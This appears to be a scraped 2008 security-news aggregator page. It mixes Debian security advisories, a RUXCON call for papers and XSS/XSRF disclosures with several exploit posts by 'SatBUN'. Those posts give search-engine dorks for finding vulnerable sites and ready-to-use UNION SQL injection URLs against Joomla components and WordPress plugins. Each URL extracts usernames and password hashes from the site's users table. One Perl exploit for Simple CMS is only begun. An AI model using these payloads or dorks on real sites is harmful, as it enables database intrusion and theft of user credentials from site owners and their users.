| Mon | Tue | Wed | Thu | Fri | Sat | Sun |
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | ||
Re: etomite xss
( 641 days 18 hours ago)
For information on this threat, please visit The information posted by the finder is inaccurate.
Re: etomite xss
( 641 days 18 hours ago)
After researching this threat it appears that this is not a direct issue with Etomite itself but, rather, an exploit which server security lets through... I have tested several different scripts on several servers and have found this to be the case... ...
[SECURITY] [DSA 1495-2] New nagios-plugins packages fix regression
( 641 days 18 hours ago)
- Debian Security Advisory DSA-1495-2 securityatdebian.org Moritz Muehlenhoff February 17, 2008 - Package : nagios-plugins Vulnerability : buffer overflows Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-5198 CVE-2007-5623 A problem with the build system of the nagios-plugins package from old ...
(tip=sollinkicerik)SQL Injection Vulnerability
( 641 days 18 hours ago)
## ## ## ## ## ## CoRPITX ## ## ## ## ## ## Turkey # # www.Hayalet-hack.com # www.zone-turk.net/ # # (tip=sollinkicerik)SQL Injection Vulnerability # # # AUTHOR : xcorpitx # # HOME : www.Hayalet-hack.com / www.zone-turk.net # ...
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
( 641 days 18 hours ago)
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery Author: L4teral Impact: Cross Site Scripting Cross Site Request Forgery Status: patch available Affected software description: Application: ProjectPier Version: <= 0.80 Vendor: Description: ProjectPier is a Free, Open-Source, self-hosted PHP application for ...
ATutor <= 1.5.5 Cross Site Scripting
( 641 days 18 hours ago)
ATutor <= 1.5.5 Cross Site Scripting Author: L4teral Impact: Cross Site Scripting Status: patch available Affected software description: Application: ATutor Version: <= 1.5.5 Vendor: Description: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. ...
joomla SQL Injection(com_ricette)
( 641 days 18 hours ago)
# # joomla SQL Injection(comricette) # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: comricette # # DORK 2 : allinurl: "comricette"id # EXPLOIT : index.php?option=comricette&Itemid=SatBUN&func=detail&id=-9999999/**/union/**/select/**/0,0, 0x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mosusers/* # SatBUN i AM NOT HACKER SatBUN
joomla SQL Injection (cat)(com_downloads)
( 641 days 18 hours ago)
# # joomla SQL Injection (cat)(comdownloads) # # # AUTHOR : SatBUN # # HOME : # # MAİL : www.milw0rm.comatgmail.com # # # DORK 1 : allinurl:"selectcat"comdownloads # EXPLOIT : index.php?option=comdownloads&Itemid=SatBUN&func=selectcat&cat=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mosusers/* # SatBUN i AM NOT HACKER SatBUN
RUXCON 2008 CALL FOR PAPERS
( 641 days 18 hours ago)
RUXCON 2008 CALL FOR PAPERS RuxCon would like to announce the call for papers for the fifth annual RuxCon conference. This year the conference will commence during the 29th/30th November. As with previous years, RuxCon will be held at the University of Technology, Sydney, Australia. ...
WordPress album PHOTO SQL Injection
( 641 days 18 hours ago)
# # WordPress album PHOTO SQL Injection # # # AUTHOR : SatBUN # # HOME 1 : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: pageid album "photo" # EXAMPLE = [exploit] EXPLOİT SatBUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,userlogin,0x7c,userpass,0x7c)/**/from%2F%2A%2A%2Fwpusers/**WHERE admin 1= 1 ...
joomla SQL Injection(com_jooget)
( 641 days 18 hours ago)
# # joomla SQL Injection(comjooget) # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl: id "comjooget" # # DORK 2 : allinurl: detail "comjooget" # DORK 3 : allinurl: "comjooget" EXPLOIT : index.php?option=comjooget&Itemid=SatBUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/josusers/* ...
Wordpress Plugin (wp-people) SQL Injection
( 641 days 18 hours ago)
# # Wordpress Plugin (wp-people) SQL Injection # # # AUTHOR : SatBUN # # HOME : # # # DORKS 1 : allinurl :"allinurl: "wp-people"" # EXPLOIT : wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuserpass%2Cuserlogin%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwpusers # SatBUN GOOD LUCKY SatBUN
WordPress SQL Injection(wp-content-simple-forum)
( 641 days 18 hours ago)
# # WordPress SQL Injection(wp-content-simple-forum) # # # AUTHOR : SatBUN # # HOME : # # # DORKS 1 : allinurl :"wp-content/plugins/simple-forum" # # DORK 2 : allinurl :"simple-forum/ahah" # EXPLOIT : wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,userlogin,0x7c,userpass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwpusers # SatBUN GOOD LUCKY SatBUN
Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit
( 641 days 18 hours ago)
#!/usr/bin/perl # Simple CMS <= 1.0.3 (?area=) Remote SQL Injection Exploit # Code by JosS Jose Luis Góngora Fernández # Contact: sys-project[at]hotmail.com # Spanish Hackers Team / Sys - Project # # special thanks to ka0x print "\t\t\n\n"; ...
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties
( 641 days 18 hours ago)
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN [b] 1) Create Webmaster (admin) XSRF Vulnerability[/b]
Debian: New nagios-plugins packages fix regression
( 641 days 19 hours ago)
LinuxSecurity.com: Several local/remote vulnerabilities have been discovered in two of the plugins for the Nagios network monitoring and management system. The Common Vulnerabilities and Exposures project identifies the following problems:
Debian: New clamav packages fix several vulnerabilities
( 641 days 19 hours ago)
LinuxSecurity.com: It was discovered that temporary files are created insecurely, which may result in local denial of service by overwriting files.






